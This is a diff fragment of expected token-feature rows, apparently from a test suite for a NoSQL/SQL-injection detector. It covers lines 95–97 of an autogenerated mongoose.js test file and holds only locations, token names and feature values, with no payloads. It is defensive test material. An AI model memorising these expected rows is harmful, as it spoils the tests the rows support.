autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:38:95:53 | exceptional return of err.count(query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:38:95:53 | exceptional return of err.count(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:38:95:53 | exceptional return of err.count(query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:42:95:46 | count | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:42:95:46 | count | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:42:95:46 | count | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:42:95:46 | count | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:48:95:52 | query | CalleeFlexibleAccessPath | err.count | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:48:95:52 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:48:95:52 | query | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | @@ -2756,6 +13883,38 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:48:95:52 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:48:95:52 | query | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:48:95:52 | query | receiverName | err | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:2:96:9 | Document | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:2:96:9 | Document | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:2:96:9 | Document | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:2:96:9 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:2:96:14 | Document.find | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:2:96:14 | Document.find | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:2:96:14 | Document.find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:2:96:14 | Document.find | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:2:96:17 | Document.find(X) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:2:96:17 | Document.find(X) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:2:96:17 | Document.find(X) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:2:96:17 | Document.find(X) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:2:96:17 | exceptional return of Document.find(X) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:2:96:17 | exceptional return of Document.find(X) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:2:96:17 | exceptional return of Document.find(X) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:2:96:17 | exceptional return of Document.find(X) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:2:96:22 | Documen ... X).then | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:2:96:22 | Documen ... X).then | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:2:96:22 | Documen ... X).then | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:2:96:22 | Documen ... X).then | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:2:96:52 | Documen ... query)) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:2:96:52 | Documen ... query)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:2:96:52 | Documen ... query)) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:2:96:52 | Documen ... query)) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:2:96:52 | exceptional return of Documen ... query)) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:2:96:52 | exceptional return of Documen ... query)) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:2:96:52 | exceptional return of Documen ... query)) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:2:96:52 | exceptional return of Documen ... query)) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:11:96:14 | find | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:11:96:14 | find | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:11:96:14 | find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:11:96:14 | find | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:16:96:16 | X | CalleeFlexibleAccessPath | Document.find | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:16:96:16 | X | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:16:96:16 | X | calleeImports | mongoose | @@ -2764,6 +13923,18 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:16:96:16 | X | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:16:96:16 | X | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:16:96:16 | X | receiverName | Document | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:19:96:22 | then | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:19:96:22 | then | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:19:96:22 | then | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:19:96:22 | then | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:24:96:23 | query | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:24:96:23 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:24:96:23 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:24:96:23 | query | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:24:96:51 | 'arguments' object of anonymous function | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:24:96:51 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:24:96:51 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:24:96:51 | 'arguments' object of anonymous function | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:24:96:51 | (res) = ... (query) | CalleeFlexibleAccessPath | Document.find().then | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:24:96:51 | (res) = ... (query) | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:24:96:51 | (res) = ... (query) | calleeImports | mongoose | @@ -2771,12 +13942,88 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:24:96:51 | (res) = ... (query) | contextSurroundingFunctionParameters | (req, res)\n(res) | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:24:96:51 | (res) = ... (query) | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:24:96:51 | (res) = ... (query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:24:96:51 | exceptional return of anonymous function | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:24:96:51 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:24:96:51 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:24:96:51 | exceptional return of anonymous function | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:24:96:51 | return of anonymous function | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:24:96:51 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:24:96:51 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:24:96:51 | return of anonymous function | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:25:96:27 | res | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:25:96:27 | res | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:25:96:27 | res | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:25:96:27 | res | contextSurroundingFunctionParameters | (req, res)\n(res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:25:96:27 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:25:96:27 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:25:96:27 | res | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:25:96:27 | res | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:33:96:35 | res | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:33:96:35 | res | contextSurroundingFunctionParameters | (req, res)\n(res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:33:96:35 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:33:96:35 | res | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:33:96:38 | res[i] | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:33:96:38 | res[i] | contextSurroundingFunctionParameters | (req, res)\n(res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:33:96:38 | res[i] | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:33:96:38 | res[i] | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:33:96:44 | res[i].count | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:33:96:44 | res[i].count | contextSurroundingFunctionParameters | (req, res)\n(res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:33:96:44 | res[i].count | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:33:96:44 | res[i].count | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:33:96:51 | exceptional return of res[i].count(query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:33:96:51 | exceptional return of res[i].count(query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:33:96:51 | exceptional return of res[i].count(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:33:96:51 | exceptional return of res[i].count(query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:33:96:51 | res[i].count(query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:33:96:51 | res[i].count(query) | contextSurroundingFunctionParameters | (req, res)\n(res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:33:96:51 | res[i].count(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:33:96:51 | res[i].count(query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:37:96:37 | i | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:37:96:37 | i | contextSurroundingFunctionParameters | (req, res)\n(res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:37:96:37 | i | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:37:96:37 | i | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:40:96:44 | count | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:40:96:44 | count | contextSurroundingFunctionParameters | (req, res)\n(res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:40:96:44 | count | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:40:96:44 | count | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:46:96:50 | query | CalleeFlexibleAccessPath | res.?.count | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:46:96:50 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:46:96:50 | query | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:46:96:50 | query | contextSurroundingFunctionParameters | (req, res)\n(res) | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:46:96:50 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:96:46:96:50 | query | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:2:97:9 | Document | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:2:97:9 | Document | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:2:97:9 | Document | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:2:97:9 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:2:97:14 | Document.find | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:2:97:14 | Document.find | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:2:97:14 | Document.find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:2:97:14 | Document.find | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:2:97:17 | Document.find(X) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:2:97:17 | Document.find(X) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:2:97:17 | Document.find(X) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:2:97:17 | Document.find(X) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:2:97:17 | exceptional return of Document.find(X) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:2:97:17 | exceptional return of Document.find(X) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:2:97:17 | exceptional return of Document.find(X) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:2:97:17 | exceptional return of Document.find(X) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:2:97:22 | Documen ... X).then | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:2:97:22 | Documen ... X).then | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:2:97:22 | Documen ... X).then | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:2:97:22 | Documen ... X).then | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:2:97:52 | Documen ... query)) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:2:97:52 | Documen ... query)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:2:97:52 | Documen ... query)) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:2:97:52 | Documen ... query)) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:2:97:52 | exceptional return of Documen ... query)) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:2:97:52 | exceptional return of Documen ... query)) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:2:97:52 | exceptional return of Documen ... query)) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:2:97:52 | exceptional return of Documen ... query)) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:11:97:14 | find | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:11:97:14 | find | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:11:97:14 | find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:11:97:14 | find | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:16:97:16 | X | CalleeFlexibleAccessPath | Document.find | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:16:97:16 | X | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:16:97:16 | X | calleeImports | mongoose | @@ -2785,6 +14032,10 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:16:97:16 | X | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:16:97:16 | X | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:16:97:16 | X | receiverName | Document | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:19:97:22 | then | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:19:97:22 | then | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:19:97:22 | then | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:19:97:22 | then | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:24:97:24 | Y | CalleeFlexibleAccessPath | Document.find().then | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:24:97:24 | Y | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:24:97:24 | Y | calleeImports | mongoose | @@ -2792,6 +14043,14 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:24:97:24 | Y | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:24:97:24 | Y | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:24:97:24 | Y | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:27:97:26 | query | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:27:97:26 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:27:97:26 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:27:97:26 | query | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:27:97:51 | 'arguments' object of anonymous function | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:27:97:51 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:27:97:51 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:27:97:51 | 'arguments' object of anonymous function | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:27:97:51 | (err) = ... (query) | CalleeFlexibleAccessPath | Document.find().then | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:27:97:51 | (err) = ... (query) | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:27:97:51 | (err) = ... (query) | calleeImports | mongoose | @@ -2799,6 +14058,42 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:27:97:51 | (err) = ... (query) | contextSurroundingFunctionParameters | (req, res)\n(err) | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:27:97:51 | (err) = ... (query) | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:27:97:51 | (err) = ... (query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:27:97:51 | exceptional return of anonymous function | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:27:97:51 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:27:97:51 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:27:97:51 | exceptional return of anonymous function | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:27:97:51 | return of anonymous function | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:27:97:51 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:27:97:51 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:27:97:51 | return of anonymous function | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:28:97:30 | err | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:28:97:30 | err | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:28:97:30 | err | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:28:97:30 | err | contextSurroundingFunctionParameters | (req, res)\n(err) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:28:97:30 | err | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:28:97:30 | err | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:28:97:30 | err | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:28:97:30 | err | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:36:97:38 | err | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:36:97:38 | err | contextSurroundingFunctionParameters | (req, res)\n(err) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:36:97:38 | err | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:36:97:38 | err | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:36:97:44 | err.count | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:36:97:44 | err.count | contextSurroundingFunctionParameters | (req, res)\n(err) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:36:97:44 | err.count | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:36:97:44 | err.count | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:36:97:51 | err.count(query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:36:97:51 | err.count(query) | contextSurroundingFunctionParameters | (req, res)\n(err) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:36:97:51 | err.count(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:36:97:51 | err.count(query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:36:97:51 | exceptional return of err.count(query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:36:97:51 | exceptional return of err.count(query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:36:97:51 | exceptional return of err.count(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:36:97:51 | exceptional return of err.count(query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:40:97:44 | count | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:97:40:97:44 | count | contextSurroundingFunctionParameters | (req, res)\n(err) | +| 